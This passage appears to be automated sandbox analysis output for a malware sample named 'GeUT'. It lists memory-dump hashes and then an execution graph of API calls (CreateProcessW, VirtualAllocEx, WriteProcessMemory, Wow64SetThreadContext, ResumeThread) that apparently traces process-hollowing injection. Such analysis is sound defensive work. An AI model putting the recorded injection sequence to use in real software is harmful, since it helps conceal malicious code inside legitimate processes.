                      • Opcode ID: b123db8cfc08dbaa6624c96f4c75e0f427b7f60ac7e57b04017a49e85bfc756e
                      • Instruction ID: 7172351605afaba7d81bb94814261783e190afcc23bf6426a04f5128f0a63386
                      • Opcode Fuzzy Hash: b123db8cfc08dbaa6624c96f4c75e0f427b7f60ac7e57b04017a49e85bfc756e
                      • Instruction Fuzzy Hash: D331B030B02204CFDB44EFA5C45476EBBE1AF88311F14C56AD9069B3A6DB74DC82CB94
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c720814d6109cc99bcf3c87eeb007455d8f03661a9ba7677176ada6c158da533
                      • Instruction ID: 3b43eb84de32b5ef1c1fc2892963a29653668ec242fe551bf712f1000be63ebd
                      • Opcode Fuzzy Hash: c720814d6109cc99bcf3c87eeb007455d8f03661a9ba7677176ada6c158da533
                      • Instruction Fuzzy Hash: 33B18230B00300AFEB58BB75D951BBE77A7ABC9750F159428E902DB398DF34AC468791
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 20bcde531aa3cf52db60cea0d0873a5612921537c52d5db36d0c14e7479dec64
                      • Instruction ID: ba071466e0f62686358d2bdfd5742e9f42ca05a96cfaaa3cb9dac103fbbb5324
                      • Opcode Fuzzy Hash: 20bcde531aa3cf52db60cea0d0873a5612921537c52d5db36d0c14e7479dec64
                      • Instruction Fuzzy Hash: 99019C31A062805FC311FB7AD801E9A3BB6CBC9311F00553ED98ACB259EF705904CBA2
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 678e817c344b8cef5db1cbabf51bcfa4f1a4747092830b793616bb9e900f84b7
                      • Instruction ID: ce320a1f9f420f850c0049f0daa1d36c0915b432f0d31e40e4c64b53f619c8d1
                      • Opcode Fuzzy Hash: 678e817c344b8cef5db1cbabf51bcfa4f1a4747092830b793616bb9e900f84b7
                      • Instruction Fuzzy Hash: E9519130B00244AFEB98FB75D9557BE76A7AFC8710F148429E802E7395DF349C868B91
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b430ddb023c18ebc6c0cf8570f313028968d8c6660b37be23f14869767b7cba3
                      • Instruction ID: e4583ca2953512691f319f3b2c36718dfad073a21a4670758fe71ae6d0f59326
                      • Opcode Fuzzy Hash: b430ddb023c18ebc6c0cf8570f313028968d8c6660b37be23f14869767b7cba3
                      • Instruction Fuzzy Hash: 9D41BC7090524A8FDB10EFAAD940A9AFFF4FF88314F0481AAD108E7351D774A845CFA5
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f700cb4fa1ed66678c39f1833d50575cfda0b012b005880b1427934915e26580
                      • Instruction ID: aa6a4bf42c749b262db2f3650295106cc9793a8a974cc359fb700cef2ada8f68
                      • Opcode Fuzzy Hash: f700cb4fa1ed66678c39f1833d50575cfda0b012b005880b1427934915e26580
                      • Instruction Fuzzy Hash: 93312821F042445BDB89B7BA88557BE7AD7AFC9710F18812CC142DB389EE748D0683E0
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d8522de28ea1eff909ad97b892779effa568aef6977128cd698a4d6dd4332e2f
                      • Instruction ID: 1380366f78cc058d203b6f6c2835c68a2f87db5a548f3bfd234911e4b7f2a4fd
                      • Opcode Fuzzy Hash: d8522de28ea1eff909ad97b892779effa568aef6977128cd698a4d6dd4332e2f
                      • Instruction Fuzzy Hash: 76411C74E40209CFEB94EFBAD554BAEBBB1AF4C315F118068D601BB2A1CB35D944CB90
                      Memory Dump Source
                      • Source File: 00000003.00000002.3408121746.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_98d000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 489b2f44dd062767580ae6ef69ef5ec690c4825887dc325b0aa53f9620cc7b3a
                      • Instruction ID: bac864dbe97b5a64d679ed404a3485a548bab7e07f657d6489369d3a3e6e3532
                      • Opcode Fuzzy Hash: 489b2f44dd062767580ae6ef69ef5ec690c4825887dc325b0aa53f9620cc7b3a
                      • Instruction Fuzzy Hash: B721D372505240EFDB15EF14D9C4B2ABB65FB88314F24C669E9094B396C33AD816CBA2
                      Memory Dump Source
                      • Source File: 00000003.00000002.3408121746.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_98d000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 071d257b08ef3ad99f94c503c4ed883a0538a2119de36d5df9bcdc119bc68b9e
                      • Instruction ID: ca5954eef40af6a2c10e415b518c59d7ea22d42ea39289c1ecce506907a819a9
                      • Opcode Fuzzy Hash: 071d257b08ef3ad99f94c503c4ed883a0538a2119de36d5df9bcdc119bc68b9e
                      • Instruction Fuzzy Hash: 6E21E272505240EFDB04AF24D9C0F26BB65FB84324F20C569D9090B3E6C37AE856CBA1
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9787aff1c6c585f6571a7789804354b93cdc68ced4c132488529a80be0da73b8
                      • Instruction ID: e3ef61c908ac35dad6499b0316be1ac1900fe70501e62847e93d5093671e70a3
                      • Opcode Fuzzy Hash: 9787aff1c6c585f6571a7789804354b93cdc68ced4c132488529a80be0da73b8
                      • Instruction Fuzzy Hash: 09118135B003119BEF48BB765C257BE26A3ABC4A10F045828ED12BF394DE78A90647A1
                      Memory Dump Source
                      • Source File: 00000003.00000002.3409211957.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_a9d000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cd7ef51034010a6566fcf062f459a7ae9f79af0ed9a68dcbb7d3bd8835aa7726
                      • Instruction ID: bb5e1690fb1d86ff0d9592bff0b6c73f72a4f43fb0cd4fc56b602084fc94815f
                      • Opcode Fuzzy Hash: cd7ef51034010a6566fcf062f459a7ae9f79af0ed9a68dcbb7d3bd8835aa7726
                      • Instruction Fuzzy Hash: E3210476604204EFDF04DF14D9C0B26BBE5FB88314F30C66DD9094B296C77AD886CA61
                      Memory Dump Source
                      • Source File: 00000003.00000002.3409211957.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_a9d000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8540a1ca1f427b9f8e1150f24919eeb4d58a1a2ac129547fd882205c1738e2be
                      • Instruction ID: 007989936629069a83165124ca5cd334c038ddb3a802e72884d345fbb72912d1
                      • Opcode Fuzzy Hash: 8540a1ca1f427b9f8e1150f24919eeb4d58a1a2ac129547fd882205c1738e2be
                      • Instruction Fuzzy Hash: 24212675604704EFDF04DF14D5C0B2ABBA5FB84314F24C5ADE9094F252C77AD886CA62
                      Memory Dump Source
                      • Source File: 00000003.00000002.3409211957.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_a9d000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 973419c277dfd818c5fe43fc9877b57e0a042127984f72b3402f2fc1011fa8eb
                      • Instruction ID: b9a91e382c6c5ecb67ba10108a60bbe02f42ee8dd6057f32d828ddac8c466986
                      • Opcode Fuzzy Hash: 973419c277dfd818c5fe43fc9877b57e0a042127984f72b3402f2fc1011fa8eb
                      • Instruction Fuzzy Hash: 1221FF71604300EFDF14DF24D9C0B26BFA5EB84318F20C66DD90A4B292C77AD886CA61
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: aee441a56e1218ec68ac71c575899e86e8123b210b31934216ba35846432bd55
                      • Instruction ID: a765dfa40b41f0c8a68f91a542b4c4e1df0b5f07e620decfe53613ea6afd0307
                      • Opcode Fuzzy Hash: aee441a56e1218ec68ac71c575899e86e8123b210b31934216ba35846432bd55
                      • Instruction Fuzzy Hash: D821AC78A02500CFC799EF2AD450E69B7B1BF8831131180EDD506CB3B4DB30A806DF81
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 58e5cfa4c95a639b94f1c557847e1f954765b1d491df7f912d5414f199a608a3
                      • Instruction ID: f884aad54b2da6282742167bd359c5ec4a4b37cbec020f81e70bc8c091448f2f
                      • Opcode Fuzzy Hash: 58e5cfa4c95a639b94f1c557847e1f954765b1d491df7f912d5414f199a608a3
                      • Instruction Fuzzy Hash: FC213578A02500CFC759EF2AD454E29B7B1BF8871631580ADEA06CB3B5DB30A816DF81
                      Memory Dump Source
                      • Source File: 00000003.00000002.3409211957.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_a9d000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 80e21d8e2d11cbc69108ddc6a59100e5f7165921a4ee8a8e927718d1fc6e874d
                      • Instruction ID: ffd44abf8f3c44082874242bea6566e6c6b7eb5ee3fa28f8e233054a8cab4178
                      • Opcode Fuzzy Hash: 80e21d8e2d11cbc69108ddc6a59100e5f7165921a4ee8a8e927718d1fc6e874d
                      • Instruction Fuzzy Hash: B82193755093808FDB16CF20D590715BFB1EB45314F28C5EAD8498B6A7C33AD84ACB62
                      Memory Dump Source
                      • Source File: 00000003.00000002.3408121746.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_98d000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
                      • Instruction ID: be8a2f1f16029ab9949541ef9726c455cf5ee65278fc07df48698a178c76aa4b
                      • Opcode Fuzzy Hash: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
                      • Instruction Fuzzy Hash: 1721B476504240DFCB16DF10D9C4B1ABF71FB84314F24C5AADC054B656C33AD816CBA2
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5213f3a6a7ec28827bb13c00c27fea293fa9f01b0e0c1d89f7e2a7ae98249357
                      • Instruction ID: 95d8aac43e6edf16a0225004666c058846230c9ed8f1c678b18bff599c5af124
                      • Opcode Fuzzy Hash: 5213f3a6a7ec28827bb13c00c27fea293fa9f01b0e0c1d89f7e2a7ae98249357
                      • Instruction Fuzzy Hash: EF11C1746022018FD754EFAAE940A06FBB1FF88309309C1A6C104CB326DB30E896CB95
                      Memory Dump Source
                      • Source File: 00000003.00000002.3408121746.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_98d000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                      • Instruction ID: 713cc4f0b693d9181dce04e9ff18199fe637150f7af7bc46d325d77f39b51417
                      • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                      • Instruction Fuzzy Hash: B811E676504280DFCB15DF10D5C4B16BF72FB94324F24C5A9D8094B7A6C33AE856CBA1
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0c1b466b91f337d870b736d4ee61f8a3a0c7e735ca7f2e43b0a015a4c367f928
                      • Instruction ID: 61459ae31e2509843af31e8f42287f3799afe5d09eaefcd699e549f36a41ad3d
                      • Opcode Fuzzy Hash: 0c1b466b91f337d870b736d4ee61f8a3a0c7e735ca7f2e43b0a015a4c367f928
                      • Instruction Fuzzy Hash: 8311A174E00115CFCB98EF6AC500AA9BBB1BF09311B2049A9D516DB360D7B1AD4ADF80
                      Memory Dump Source
                      • Source File: 00000003.00000002.3409211957.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_a9d000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                      • Instruction ID: 67b49d5f395f78be7eb423cb02962b3b077f464c94e5cc17ab69f839efef3e60
                      • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                      • Instruction Fuzzy Hash: F4119D79604684DFCF05CF10D5C4B1ABBA1FB84318F28C6A9D8494F656C33AD84ACFA2
                      Memory Dump Source
                      • Source File: 00000003.00000002.3409211957.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_a9d000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                      • Instruction ID: 959fb796f1009ded26899aee228e3e8994f3ce2ae1292225da9efb0e6ef248d5
                      • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                      • Instruction Fuzzy Hash: D7119D76604284DFDB05CF10D9C4B15BBB1FB84318F24C6AAD8494B656C33AD89ACB61
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6d91162b9cea86bd966ab10920f22ab8453e121f3472bf7028b1c6e557dc9937
                      • Instruction ID: 3a88210040d32310d1f4538db1b828567f71d3fda76ba523afe49207edfd8973
                      • Opcode Fuzzy Hash: 6d91162b9cea86bd966ab10920f22ab8453e121f3472bf7028b1c6e557dc9937
                      • Instruction Fuzzy Hash: 3D01F935B141069FDFA8BB6AD8142EF7BB29B88313F000439DA4567690CF351805CBC2
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8111b389b13a7a32bd0db0709b37987f4d3148c3e20364dcf107620ff65b38bc
                      • Instruction ID: b071b0b8858f60a9d3d6553c7035659e9c2612a6404bc1cb1f73b91cc3dd306f
                      • Opcode Fuzzy Hash: 8111b389b13a7a32bd0db0709b37987f4d3148c3e20364dcf107620ff65b38bc
                      • Instruction Fuzzy Hash: 90113678B02500CFC719EF26E454E18B7A1BF8871631580ADEA028B3B5CB71AC1ADF41
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 871fc7ae44d6cc2ab19c1e09ec895f4d41c75014dc9238c65e14f861aaa765e3
                      • Instruction ID: b4cd830441d07462f114c4bf75859767947a1441900eb3a53f9105d12dcbc824
                      • Opcode Fuzzy Hash: 871fc7ae44d6cc2ab19c1e09ec895f4d41c75014dc9238c65e14f861aaa765e3
                      • Instruction Fuzzy Hash: AF0120326022049FC754FB7AE801E9D77EADBC8222F00553DDA0D87254EF706905CBE1
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eae6f062e166c32712068819741c3ab8c4e4f028e3542f33fbefa72fbb3341cc
                      • Instruction ID: c149878e611587ab5b9fccfadc1fb13f667fca68930640bb7d000241eab3f08f
                      • Opcode Fuzzy Hash: eae6f062e166c32712068819741c3ab8c4e4f028e3542f33fbefa72fbb3341cc
                      • Instruction Fuzzy Hash: DF1100B58003498FDB60DF9AC985BDEBBF4FF48324F20841AD559A7250C3B5A984CFA5
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 149f27d46e640f71382298d8dbefe8d78c207366943054ca5d207820fd3190cd
                      • Instruction ID: 466e0c3d20d65221406964a2d0891826ce14fce4e01532fedca0e3299a2629ea
                      • Opcode Fuzzy Hash: 149f27d46e640f71382298d8dbefe8d78c207366943054ca5d207820fd3190cd
                      • Instruction Fuzzy Hash: 2D1123B58003498FDB10DF9AC985BDEBBF4FF48324F208419D519A3250C3B5A944CFA1
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f29777bdba01112afe3d85999a1aed20ff983469aab10c15400a1df2e6e11897
                      • Instruction ID: 21a83582c09543c1f5bb582588523e8c16d60abda644de01ea7b84da544ee277
                      • Opcode Fuzzy Hash: f29777bdba01112afe3d85999a1aed20ff983469aab10c15400a1df2e6e11897
                      • Instruction Fuzzy Hash: 82014879A12510CFC71AEF26D444E18B7A5FF8871631541ADEA128B3B5CB71AC1ACF41
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0834cd0d7acd0951d7e559aee76472cecb2fb3c6c7aedf2cfc8643a94862cc6d
                      • Instruction ID: e9ca6df0d6a79abab4f2992f2763529354299be252456d1b684d8d8f1ac015c0
                      • Opcode Fuzzy Hash: 0834cd0d7acd0951d7e559aee76472cecb2fb3c6c7aedf2cfc8643a94862cc6d
                      • Instruction Fuzzy Hash: BAF0B83AA00520CFCB19EB72D800A5CB761AB8871631042A9D9124B2B8CBB1AC5ACF80
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 505778592e8632ebff729d442c14803ffe86facb7f7940cd4fda2fbefcb78e89
                      • Instruction ID: 14e673fd8cd27ada2f4e99ab64a471e0da4f1055dab1d3a3fc3b0b2f6f9f8165
                      • Opcode Fuzzy Hash: 505778592e8632ebff729d442c14803ffe86facb7f7940cd4fda2fbefcb78e89
                      • Instruction Fuzzy Hash: C0D02BB10063028BE307B731F506A913F26DBC0600B009124D40589536DFBC8A1E1AA2
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 912654a92dcfdc9d42a71fc69d5d4a004414c90de6dfd0be46a141975b4fc17d
                      • Instruction ID: 5bbd536ad16843cf92b24aaa7cbbb209f05cb01b1232b9886ea4d4f6c8b07217
                      • Opcode Fuzzy Hash: 912654a92dcfdc9d42a71fc69d5d4a004414c90de6dfd0be46a141975b4fc17d
                      • Instruction Fuzzy Hash: D0D09E76A04508DFDB44EBC1E881AEDBB31FB8C335F114512D61123615C7315AA59BD1
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 53e4d11c680b9ad00f2ae39450fa113e5634a972c2bf6a229655aa634ccca1cc
                      • Instruction ID: b683a7b11a776d628a0d23e5354b67460167ad24cad963ed2c4c9ccb1dd7657a
                      • Opcode Fuzzy Hash: 53e4d11c680b9ad00f2ae39450fa113e5634a972c2bf6a229655aa634ccca1cc
                      • Instruction Fuzzy Hash: 46C0C03410020A8BC30AF732F808E043B6AE6C0F00B00A528E10849239DFFC1F0E1FB1
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6fa59e13196e1d7dc320eb73dfc52f836a5adf95eebad68ed0c602a899329dcc
                      • Instruction ID: 2f57266c158f6bc519af9aac4ba8e32461c2ca89208157e612e3cc3cce1d7821
                      • Opcode Fuzzy Hash: 6fa59e13196e1d7dc320eb73dfc52f836a5adf95eebad68ed0c602a899329dcc
                      • Instruction Fuzzy Hash: C6C01231A1000487CA04FBF4AC050DCBB20EE80368754076AA22A4E4E1EFA12A268A91

                      Execution Graph

                      Execution Coverage:30.8%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:46
                      Total number of Limit Nodes:4
                      execution_graph 4039 1874e40 4040 1874ecd CreateProcessW 4039->4040 4042 1875026 4040->4042 4042->4042 4051 18771d0 4052 18771ea 4051->4052 4053 1877239 4052->4053 4056 187727c 4052->4056 4060 1877288 4052->4060 4058 1877288 4056->4058 4064 187614c 4058->4064 4059 18774af 4059->4052 4061 18772bb 4060->4061 4062 187614c CreateProcessW 4061->4062 4063 18774af 4062->4063 4063->4052 4065 1877ce8 CreateProcessW 4064->4065 4067 1877ece 4065->4067 4068 18720f0 VirtualAllocEx 4069 18721a7 4068->4069 4043 1871ec8 4044 1871f26 4043->4044 4045 1871f3b Wow64SetThreadContext 4043->4045 4044->4045 4046 1871f84 4045->4046 4047 1871ba8 4048 1871c35 CreateProcessW 4047->4048 4050 1871d8e 4048->4050 4070 1871fd8 ReadProcessMemory 4071 1872097 4070->4071 4072 1875f98 4074 1875fb2 4072->4074 4073 1876001 4074->4073 4077 1876450 4074->4077 4081 187644a 4074->4081 4079 1876483 4077->4079 4085 1874024 4079->4085 4080 1876677 4080->4074 4083 1876483 4081->4083 4082 1874024 CreateProcessW 4084 1876677 4082->4084 4083->4082 4084->4074 4086 1876eb0 CreateProcessW 4085->4086 4088 1877096 4086->4088 4089 1872338 ResumeThread 4090 18723c0 4089->4090 4091 18721f8 4092 1872276 WriteProcessMemory 4091->4092 4093 1872261 4091->4093 4094 18722d8 4092->4094 4093->4092

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 543 1875c6c-1875d03 544 1875d05-1875d17 543->544 545 1875d1a-1875d28 543->545 544->545 546 1875d3f-1875d7b 545->546 547 1875d2a-1875d3c 545->547 548 1875d8f-1875e5c CreateProcessW 546->548 549 1875d7d-1875d8c 546->549 547->546 553 1875e65-1875f24 548->553 554 1875e5e-1875e64 548->554 549->548 564 1875f26-1875f4f 553->564 565 1875f5a-1875f65 553->565 554->553 564->565 568 1875f66 565->568 568->568
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01875E49
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: d5e8e8f69156ff1885ffa89d6032254354dca51e63069680132bbb5bd1e06c41
                      • Instruction ID: d572c895d273cd5c546eb0c7fc136ae18b271c6583a9a0a87373b474ca1af3f5
                      • Opcode Fuzzy Hash: d5e8e8f69156ff1885ffa89d6032254354dca51e63069680132bbb5bd1e06c41
                      • Instruction Fuzzy Hash: 5781C075D00229DFDF21CFA9C984BEDBBB5BB49300F1091AAE508B7260DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 516 1874e34-1874ecb 517 1874ee2-1874ef0 516->517 518 1874ecd-1874edf 516->518 519 1874f07-1874f43 517->519 520 1874ef2-1874f04 517->520 518->517 521 1874f57-1875024 CreateProcessW 519->521 522 1874f45-1874f54 519->522 520->519 526 1875026-187502c 521->526 527 187502d-18750ec 521->527 522->521 526->527 537 1875122-187512d 527->537 538 18750ee-1875117 527->538 542 187512e 537->542 538->537 542->542
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01875011
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 6562aa460b0373c1bf0b42fa23a599ba7a0b1d7058feaf1bd43e1d82615ef6d5
                      • Instruction ID: 38eeac6b11ff0896f50aaa41bf9e8214e3947c07148fad3994fce4af00cabc35
                      • Opcode Fuzzy Hash: 6562aa460b0373c1bf0b42fa23a599ba7a0b1d7058feaf1bd43e1d82615ef6d5
